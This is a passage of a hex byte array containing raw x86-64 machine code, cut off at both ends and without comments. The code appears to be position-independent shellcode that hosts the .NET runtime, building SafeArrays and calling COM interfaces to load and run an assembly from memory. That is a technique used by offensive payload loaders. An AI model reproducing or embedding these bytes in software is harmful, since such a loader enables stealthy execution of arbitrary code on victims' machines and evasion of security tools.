701 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00,
702 0x00, 0x48, 0x85, 0xc0, 0x75, 0x52, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
703 0x00, 0x48, 0x8b, 0x80, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x10,
704 0x02, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x10, 0x48, 0x8b, 0x8d, 0x00, 0x02,
705 0x00, 0x00, 0x4c, 0x8d, 0x81, 0x64, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x8d,
706 0x00, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x54, 0x08, 0x00, 0x00, 0x48,
707 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00,
708 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85,
709 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x79,
710 0x19, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x10,
711 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x20, 0x03,
712 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
713 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x50, 0x48, 0x8b, 0x85, 0x10,
714 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2,
715 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00,
716 0x00, 0x0f, 0x88, 0xe5, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x02,
717 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x01, 0x00, 0x00, 0x84, 0xc0, 0x75,
718 0x39, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10,
719 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x68, 0x48, 0x8b, 0x85, 0x10, 0x02,
720 0x00, 0x00, 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00,
721 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89,
722 0x85, 0xec, 0x01, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48, 0x8b,
723 0x85, 0x08, 0x02, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x01, 0x00, 0x00, 0x48,
724 0x8d, 0x55, 0xb0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
725 0x00, 0x02, 0x00, 0x00, 0xe8, 0x5c, 0xe9, 0xff, 0xff, 0x48, 0x8b, 0x85,
726 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48,
727 0x8d, 0x45, 0xb0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xd8,
728 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
729 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x60, 0x48, 0x8b, 0x85,
730 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x18, 0x48, 0x8b, 0x85, 0x10,
731 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0xd8, 0x01,
732 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
733 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x48,
734 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00,
735 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff,
736 0xd2, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xee, 0x01,
737 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
738 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x08, 0x48, 0x8b, 0x85, 0x10, 0x02,
739 0x00, 0x00, 0x48, 0x8d, 0x48, 0x20, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
740 0x00, 0x48, 0x8d, 0x90, 0x74, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
741 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x49, 0x89, 0xc8, 0x48, 0x89,
742 0xc1, 0x41, 0xff, 0xd1, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd,
743 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x9d, 0x01, 0x00, 0x00, 0xc7,
744 0x85, 0xc4, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
745 0x08, 0x02, 0x00, 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89, 0x85,
746 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48,
747 0x8b, 0x80, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01, 0x00,
748 0x00, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00,
749 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
750 0x83, 0xbd, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x47, 0x01, 0x00,
751 0x00, 0xc7, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
752 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89,
753 0x85, 0xc8, 0x01, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x95, 0xe8, 0x01, 0x00,
754 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02,
755 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00,
756 0x00, 0x0f, 0xb6, 0x84, 0x02, 0x28, 0x05, 0x00, 0x00, 0x88, 0x01, 0x83,
757 0x85, 0xe8, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00,
758 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x85, 0xe8, 0x01, 0x00,
759 0x00, 0x72, 0xbc, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
760 0x40, 0x20, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x88, 0x68, 0x01, 0x00, 0x00,
761 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x28, 0x48,
762 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x8b,
763 0x95, 0xd0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41,
764 0xff, 0xd1, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01,
765 0x00, 0x00, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0xe4,
766 0x01, 0x00, 0x00, 0xc7, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
767 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10,
768 0x48, 0x89, 0x85, 0xc8, 0x01, 0x00, 0x00, 0xeb, 0x44, 0x48, 0x8b, 0x95,
769 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00, 0x00, 0xc6, 0x84,
770 0x02, 0x28, 0x05, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xe8, 0x01, 0x00, 0x00,
771 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x48,
772 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00, 0x00,
773 0x0f, 0xb6, 0x84, 0x02, 0x28, 0x05, 0x00, 0x00, 0x88, 0x01, 0x83, 0x85,
774 0xe8, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00, 0x00,
775 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x85, 0xe8, 0x01, 0x00, 0x00,
776 0x72, 0xa7, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90,
777 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
778 0x89, 0xc1, 0xff, 0xd2, 0x8b, 0x85, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x81,
779 0xc4, 0x70, 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec,
780 0x68, 0x03, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
781 0x48, 0x89, 0x8d, 0x00, 0x03, 0x00, 0x00, 0x48, 0x89, 0x95, 0x08, 0x03,
782 0x00, 0x00, 0x4c, 0x89, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x85,
783 0xd8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xa8,
784 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x02,
785 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x38, 0x02, 0x00,
786 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x40, 0x02, 0x00, 0x00,
787 0x00, 0x00, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x0a, 0x02, 0x00, 0x00, 0x00,
788 0x00, 0x48, 0x8b, 0x85, 0x08, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8,
789 0x02, 0x0f, 0x85, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03,
790 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x80,
791 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48,
792 0x8d, 0x50, 0x38, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b,
793 0x40, 0x28, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xd4, 0x02,
794 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x69,
795 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b,
796 0x40, 0x38, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00,
797 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48,
798 0x8d, 0x95, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0,
799 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00,
800 0x00, 0x0f, 0x88, 0x80, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
801 0x00, 0x00, 0x4c, 0x8b, 0x88, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
802 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x00, 0x02, 0x00, 0x00, 0x49,
803 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff,
804 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
805 0x00, 0x00, 0x4c, 0x8b, 0x88, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
806 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x04, 0x02, 0x00, 0x00, 0x49,
807 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff,
808 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x8b, 0x85, 0x04, 0x02, 0x00,
809 0x00, 0x8b, 0x95, 0x00, 0x02, 0x00, 0x00, 0x29, 0xd0, 0x83, 0xc0, 0x01,
810 0x89, 0x85, 0xb4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xb4, 0x02, 0x00, 0x00,
811 0x00, 0x0f, 0x84, 0xe5, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
812 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01,
813 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00,
814 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x8b,
815 0x85, 0x08, 0x03, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00,
816 0x84, 0xc0, 0x0f, 0x84, 0xf7, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08,
817 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55,
818 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03,
819 0x00, 0x00, 0xe8, 0xf6, 0xe4, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03,
820 0x00, 0x00, 0x4c, 0x8b, 0x80, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55,
821 0xec, 0x48, 0x8d, 0x45, 0xf0, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48,
822 0x89, 0x85, 0xb8, 0x02, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x50, 0x02, 0x00,
823 0x00, 0x08, 0x20, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
824 0x80, 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x41, 0x89, 0xd0, 0xba,
825 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
826 0x89, 0x85, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00,
827 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00,
828 0x00, 0x48, 0x8b, 0x98, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00,
829 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x8b, 0x85,
830 0x0c, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48, 0x8d, 0x0c, 0xc5, 0x00, 0x00,
831 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x02, 0x00, 0x00, 0x48, 0x01, 0xc8,
832 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0xc1, 0x48,
833 0x8b, 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00,
834 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x8b, 0x85, 0x0c,
835 0x02, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x0c, 0x02, 0x00, 0x00,
836 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x39, 0xd0, 0x72,
837 0x8d, 0xeb, 0x7b, 0x66, 0xc7, 0x85, 0x50, 0x02, 0x00, 0x00, 0x08, 0x20,
838 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe0, 0x00,
839 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00,
840 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x58,
841 0x02, 0x00, 0x00, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
842 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xe8,
843 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
844 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x0a, 0x02, 0x00, 0x00,
845 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x58,
846 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x49, 0x89,
847 0xc8, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00,
848 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x4c,
849 0x8b, 0x88, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x50, 0x02, 0x00,
850 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8,
851 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1,
852 0x66, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x01, 0x00, 0x48, 0xc7, 0x85,
853 0x38, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
854 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
855 0x90, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00,
856 0x48, 0x8b, 0x48, 0x38, 0x48, 0x8b, 0x85, 0x30, 0x02, 0x00, 0x00, 0x48,
857 0x8b, 0x95, 0x38, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x89,
858 0x55, 0xc8, 0x48, 0x8b, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45,
859 0xd0, 0x4c, 0x8d, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xd8,
860 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89,
861 0xd0, 0x48, 0x89, 0xc2, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xd4, 0x02, 0x00,
862 0x00, 0x48, 0x83, 0xbd, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x90,
863 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
864 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x58, 0x02, 0x00, 0x00,
865 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
866 0x48, 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x02,
867 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0xe9, 0x57, 0x03, 0x00, 0x00,
868 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00,
869 0x00, 0x00, 0x00, 0xe9, 0x43, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08,
870 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x55,
871 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03,
872 0x00, 0x00, 0xe8, 0x7a, 0xe2, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03,
873 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45,
874 0xf0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xc8, 0x02, 0x00,
875 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x02, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8,
876 0x00, 0x00, 0x00, 0x00, 0xe9, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
877 0x08, 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d,
878 0x55, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00,
879 0x03, 0x00, 0x00, 0xe8, 0x25, 0xe2, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00,
880 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d,
881 0x45, 0xf0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xc0, 0x02,
882 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84,
883 0x85, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48,
884 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x88, 0x88, 0x00, 0x00,
885 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x30,
886 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48,
887 0x8b, 0x95, 0xc8, 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1,
888 0x41, 0xff, 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4,
889 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x1d, 0x02, 0x00, 0x00, 0x48, 0xc7,
890 0x85, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
891 0x08, 0x03, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84,
892 0xc0, 0x0f, 0x84, 0x4a, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x03,
893 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xf0,
894 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03, 0x00,
895 0x00, 0xe8, 0x67, 0xe1, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00,
896 0x00, 0x4c, 0x8b, 0x80, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xec,
897 0x48, 0x8d, 0x45, 0xf0, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48, 0x89,
898 0x85, 0xb8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
899 0x48, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x41, 0x89,
900 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff,
901 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xd8,
902 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xcf, 0x00, 0x00, 0x00, 0xc7, 0x85,
903 0x0c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xaf, 0x00, 0x00,
904 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08,
905 0x01, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48,
906 0x8d, 0x0c, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x02,
907 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff,
908 0xd2, 0x48, 0x89, 0x85, 0x98, 0x02, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x90,
909 0x02, 0x00, 0x00, 0x08, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
910 0x4c, 0x8b, 0x88, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x02,
911 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
912 0xd8, 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff,
913 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00,
914 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48,
915 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x02, 0x00,
916 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0xc7, 0x85, 0xd8, 0x02, 0x00,
917 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x83,
918 0xc0, 0x01, 0x89, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02,
919 0x00, 0x00, 0x8b, 0x55, 0xec, 0x39, 0xd0, 0x0f, 0x82, 0x40, 0xff, 0xff,
920 0xff, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xa5, 0x00,
921 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40,
922 0x30, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x90, 0xc8, 0x01, 0x00, 0x00, 0x48,
923 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x48, 0x30, 0x48, 0x8b,
924 0x85, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x38, 0x02, 0x00, 0x00,
925 0x48, 0x89, 0x45, 0xc0, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x85, 0x40,
926 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x02,
927 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0x02, 0x00, 0x00, 0x48, 0x89, 0x54,
928 0x24, 0x30, 0x48, 0x8b, 0x95, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x89, 0x54,
929 0x24, 0x28, 0x48, 0x8d, 0x55, 0xc0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41,
930 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x18, 0x01, 0x00, 0x00, 0x48,
931 0x89, 0xc2, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x48,
